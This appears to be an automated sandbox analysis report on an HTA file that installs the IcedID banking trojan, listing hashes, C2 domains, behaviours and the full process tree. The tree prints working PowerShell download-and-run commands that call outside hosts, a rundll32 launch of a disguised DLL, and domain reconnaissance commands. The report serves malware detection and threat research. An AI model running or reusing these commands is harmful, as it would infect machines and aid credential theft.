Analysis

  • max time kernel
    145s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-02-2023 22:06

General

  • Target

    2.hta

  • Size

    1KB

  • MD5

    78b6f14f36098c269c3d03a29eb35bc8

  • SHA1

    afd76bfe0d6ac105730b218152d0a650b6a869b7

  • SHA256

    c815343206eab5b6d29bea2d12f02bf8f446944554f053203afc414acc77e859

  • SHA512

    57b5a24f6c2610961e5c08d64872290d5b1399a80fc4335e60b88e3d20a679576a108d313b9a710b59e604732e0ea6e91313d65e16a10eb3eda3fe4e503d9712

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://helthbrotthersg.com/view.png

Extracted

Language
ps1
Source
URLs
exe.dropper

https://transfer.sh/get/vpiHmi/invoice.pdf

Extracted

Family

icedid

Campaign

3954321778

C2

ehonlionetodo.com

Signatures

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • Blocklisted process makes network request 10 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Discovers systems in the same network 1 TTPs 2 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 3 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 44 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1648
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec Bypass -NoP -C (new-object system.net.webclient).downloadFile('http://helthbrotthersg.com/view.png', 'C:\Users\Public\classic.jpg')
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:212
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec Bypass -NoP -C (new-object system.net.webclient).downloadFile('https://transfer.sh/get/vpiHmi/invoice.pdf', 'C:\Users\Public\invoice.pdf'); Start-Process C:\Users\Public\invoice.pdf
      2⤵
      • Blocklisted process makes network request
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3644
      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Public\invoice.pdf"
        3⤵
        • Checks processor information in registry
        • Modifies Internet Explorer settings
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4924
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2124
          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F0CAFC6F08744F76686BF1AE0D8A9667 --mojo-platform-channel-handle=1736 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
            5⤵
              PID:1692
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=2C7E8C8B473A9F79B0E04F415CCB4DE1 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=2C7E8C8B473A9F79B0E04F415CCB4DE1 --renderer-client-id=2 --mojo-platform-channel-handle=1752 --allow-no-sandbox-job /prefetch:1
              5⤵
                PID:1952
              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=9C6032725D176595BE55D04BFF5124A6 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=9C6032725D176595BE55D04BFF5124A6 --renderer-client-id=4 --mojo-platform-channel-handle=2192 --allow-no-sandbox-job /prefetch:1
                5⤵
                  PID:4656
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=1E2D3BA7BF4B4722F27FD1E1C2C18A9B --mojo-platform-channel-handle=2572 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                  5⤵
                    PID:3572
                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=39F80FA30618790DB44C61B523B1FED1 --mojo-platform-channel-handle=2696 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                    5⤵
                      PID:2728
                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=697FB9A370942C109905CCE604F16146 --mojo-platform-channel-handle=2800 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                      5⤵
                        PID:4308
                • C:\Windows\SysWOW64\rundll32.exe
                  "C:\Windows\System32\rundll32.exe" C:\Users\Public\classic.jpg,PluginInit
                  2⤵
                  • Loads dropped DLL
                  PID:3644
                  • C:\Windows\system32\rundll32.exe
                    "C:\Windows\System32\rundll32.exe" C:\Users\Public\classic.jpg,PluginInit
                    3⤵
                    • Blocklisted process makes network request
                    • Loads dropped DLL
                    • Accesses Microsoft Outlook profiles
                    • Modifies registry class
                    • Suspicious behavior: EnumeratesProcesses
                    • outlook_office_path
                    • outlook_win_path
                    PID:1608
                    • C:\Windows\system32\cmd.exe
                      cmd.exe /c chcp >&2
                      4⤵
                        PID:2232
                        • C:\Windows\system32\chcp.com
                          chcp
                          5⤵
                            PID:4288
                        • C:\Windows\System32\Wbem\WMIC.exe
                          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
                          4⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2928
                        • C:\Windows\system32\ipconfig.exe
                          ipconfig /all
                          4⤵
                          • Gathers network information
                          PID:1884
                        • C:\Windows\system32\systeminfo.exe
                          systeminfo
                          4⤵
                          • Gathers system information
                          PID:432
                        • C:\Windows\system32\net.exe
                          net config workstation
                          4⤵
                            PID:1356
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 config workstation
                              5⤵
                                PID:896
                            • C:\Windows\system32\nltest.exe
                              nltest /domain_trusts
                              4⤵
                                PID:3900
                              • C:\Windows\system32\nltest.exe
                                nltest /domain_trusts /all_trusts
                                4⤵
                                  PID:4248
                                • C:\Windows\system32\net.exe
                                  net view /all /domain
                                  4⤵
                                  • Discovers systems in the same network
                                  PID:2300
                                • C:\Windows\system32\net.exe
                                  net view /all
                                  4⤵
                                  • Discovers systems in the same network
                                  PID:1532
                                • C:\Windows\system32\net.exe
                                  net group "Domain Admins" /domain
                                  4⤵
                                    PID:4984
                                    • C:\Windows\system32\net1.exe
                                      C:\Windows\system32\net1 group "Domain Admins" /domain
                                      5⤵
                                        PID:1964
                              • C:\Windows\System32\CompPkgSrv.exe
                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                1⤵
                                  PID:3884

                                Network

                                MITRE ATT&CK Matrix ATT&CK v6

                                Execution

                                Command-Line Interface

                                1
                                T1059

                                Defense Evasion

                                Modify Registry

                                1
                                T1112

                                Credential Access

                                Credentials in Files

                                1
                                T1081

                                Discovery

                                Query Registry

                                2
                                T1012

                                System Information Discovery

                                5
                                T1082

                                Remote System Discovery

                                1
                                T1018

                                Collection

                                Data from Local System

                                1
                                T1005

                                Email Collection

                                1
                                T1114

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                  Filesize

                                  2KB

                                  MD5

                                  25604a2821749d30ca35877a7669dff9

                                  SHA1

                                  49c624275363c7b6768452db6868f8100aa967be

                                  SHA256

                                  7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

                                  SHA512

                                  206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                  Filesize

                                  16KB

                                  MD5

                                  09b3d9d8c83b73e317cc6f184c13d636

                                  SHA1

                                  ff9d02c9ca0333740b1e70bd430e502aa3df33f9

                                  SHA256

                                  dfbac826c42a2010a04972a2e0f320bfe5181959591b3e100013160778a2d054

                                  SHA512

                                  5204873bc7f7a912185099ade78c0d2621d3d4b1a827db49698f233291edfbb90c17af70ce6567774c281d5187da98cc8404e522ebd5e2649e6aa9a89ce281e2

                                • C:\Users\Admin\AppData\Local\Temp\sqlite64.dll
                                  Filesize

                                  1.8MB

                                  MD5

                                  26d773a69f6fad3200d49a7aaa77752b

                                  SHA1

                                  3970ffe8aefe0c30daaec65b85fb103c0fc0f2a7

                                  SHA256

                                  fca6b7fe66ad9973f18f407e83b56dacd04197cbd35efc498a342d73d6a113e5

                                  SHA512

                                  0041b52514460dda19dd065fc46393f6fbe248a4c62fce28e0819abd952756996b34fdea286eb7814a7c868a12656a065278932760e61e53f7102b0dba324e4f

                                • C:\Users\Public\classic.jpg
                                  Filesize

                                  291KB

                                  MD5

                                  6b1e64957316e65198e3a1f747402bd6

                                  SHA1

                                  f4df8c9d37a76eadf1125a74865032d83920123b

                                  SHA256

                                  fbad60002286599ca06d0ecb3624740efbf13ee5fda545341b3e0bf4d5348cfe

                                  SHA512

                                  dfc44776ec1bef64531228f9894e22a6f84a3009382044265ae51fb9cc664e8565516a3c969860548256a225902a2129709859269121f6c1ee784fc56194d2ff

                                • C:\Users\Public\classic.jpg
                                  Filesize

                                  291KB

                                  MD5

                                  6b1e64957316e65198e3a1f747402bd6

                                  SHA1

                                  f4df8c9d37a76eadf1125a74865032d83920123b

                                  SHA256

                                  fbad60002286599ca06d0ecb3624740efbf13ee5fda545341b3e0bf4d5348cfe

                                  SHA512

                                  dfc44776ec1bef64531228f9894e22a6f84a3009382044265ae51fb9cc664e8565516a3c969860548256a225902a2129709859269121f6c1ee784fc56194d2ff

                                • C:\Users\Public\classic.jpg
                                  Filesize

                                  291KB

                                  MD5

                                  6b1e64957316e65198e3a1f747402bd6

                                  SHA1

                                  f4df8c9d37a76eadf1125a74865032d83920123b

                                  SHA256

                                  fbad60002286599ca06d0ecb3624740efbf13ee5fda545341b3e0bf4d5348cfe

                                  SHA512

                                  dfc44776ec1bef64531228f9894e22a6f84a3009382044265ae51fb9cc664e8565516a3c969860548256a225902a2129709859269121f6c1ee784fc56194d2ff

                                • C:\Users\Public\invoice.pdf
                                  Filesize

                                  13KB

                                  MD5

                                  8c8a10d1fa6242df97950317260b7c70

                                  SHA1

                                  5a657b4434b2d57aec72bdfd2ac753e6e9e01ac5

                                  SHA256

                                  8030169986fb7ea4b4da63d7c85bc4f41ffcd9048c84518436f69776bdb93087

                                  SHA512

                                  f96a336812471211a2683d63799467bad77b400fd18c14cf3c3cb512a5351faa9663fa802f4fa3bd2decac8c9ba0be82eea3aaa4ddb135d4638d6a0ede88d66b

                                • memory/212-139-0x00000000063E0000-0x00000000063FE000-memory.dmp
                                  Filesize

                                  120KB

                                • memory/212-132-0x0000000000000000-mapping.dmp
                                • memory/212-138-0x0000000005DA0000-0x0000000005E06000-memory.dmp
                                  Filesize

                                  408KB

                                • memory/212-136-0x0000000005460000-0x0000000005482000-memory.dmp
                                  Filesize

                                  136KB

                                • memory/212-135-0x00000000054A0000-0x0000000005AC8000-memory.dmp
                                  Filesize

                                  6.2MB

                                • memory/212-140-0x0000000007A30000-0x00000000080AA000-memory.dmp
                                  Filesize

                                  6.5MB

                                • memory/432-187-0x0000000000000000-mapping.dmp
                                • memory/896-190-0x0000000000000000-mapping.dmp
                                • memory/1356-189-0x0000000000000000-mapping.dmp
                                • memory/1532-194-0x0000000000000000-mapping.dmp
                                • memory/1608-175-0x0000000000000000-mapping.dmp
                                • memory/1608-177-0x0000020E1AD30000-0x0000020E1AD39000-memory.dmp
                                  Filesize

                                  36KB

                                • memory/1608-178-0x0000020E1B410000-0x0000020E1B45C000-memory.dmp
                                  Filesize

                                  304KB

                                • memory/1692-151-0x0000000000000000-mapping.dmp
                                • memory/1884-186-0x0000000000000000-mapping.dmp
                                • memory/1952-154-0x0000000000000000-mapping.dmp
                                • memory/1964-196-0x0000000000000000-mapping.dmp
                                • memory/2124-149-0x0000000000000000-mapping.dmp
                                • memory/2232-183-0x0000000000000000-mapping.dmp
                                • memory/2300-193-0x0000000000000000-mapping.dmp
                                • memory/2728-167-0x0000000000000000-mapping.dmp
                                • memory/2928-185-0x0000000000000000-mapping.dmp
                                • memory/3572-164-0x0000000000000000-mapping.dmp
                                • memory/3644-137-0x0000000005620000-0x0000000005686000-memory.dmp
                                  Filesize

                                  408KB

                                • memory/3644-133-0x0000000000000000-mapping.dmp
                                • memory/3644-134-0x0000000002700000-0x0000000002736000-memory.dmp
                                  Filesize

                                  216KB

                                • memory/3644-172-0x0000000000000000-mapping.dmp
                                • memory/3644-144-0x0000000007F50000-0x00000000084F4000-memory.dmp
                                  Filesize

                                  5.6MB

                                • memory/3644-142-0x0000000007180000-0x0000000007216000-memory.dmp
                                  Filesize

                                  600KB

                                • memory/3644-141-0x00000000061E0000-0x00000000061FA000-memory.dmp
                                  Filesize

                                  104KB

                                • memory/3644-143-0x0000000007110000-0x0000000007132000-memory.dmp
                                  Filesize

                                  136KB

                                • memory/3900-191-0x0000000000000000-mapping.dmp
                                • memory/4248-192-0x0000000000000000-mapping.dmp
                                • memory/4288-184-0x0000000000000000-mapping.dmp
                                • memory/4308-170-0x0000000000000000-mapping.dmp
                                • memory/4656-159-0x0000000000000000-mapping.dmp
                                • memory/4924-145-0x0000000000000000-mapping.dmp
                                • memory/4984-195-0x0000000000000000-mapping.dmp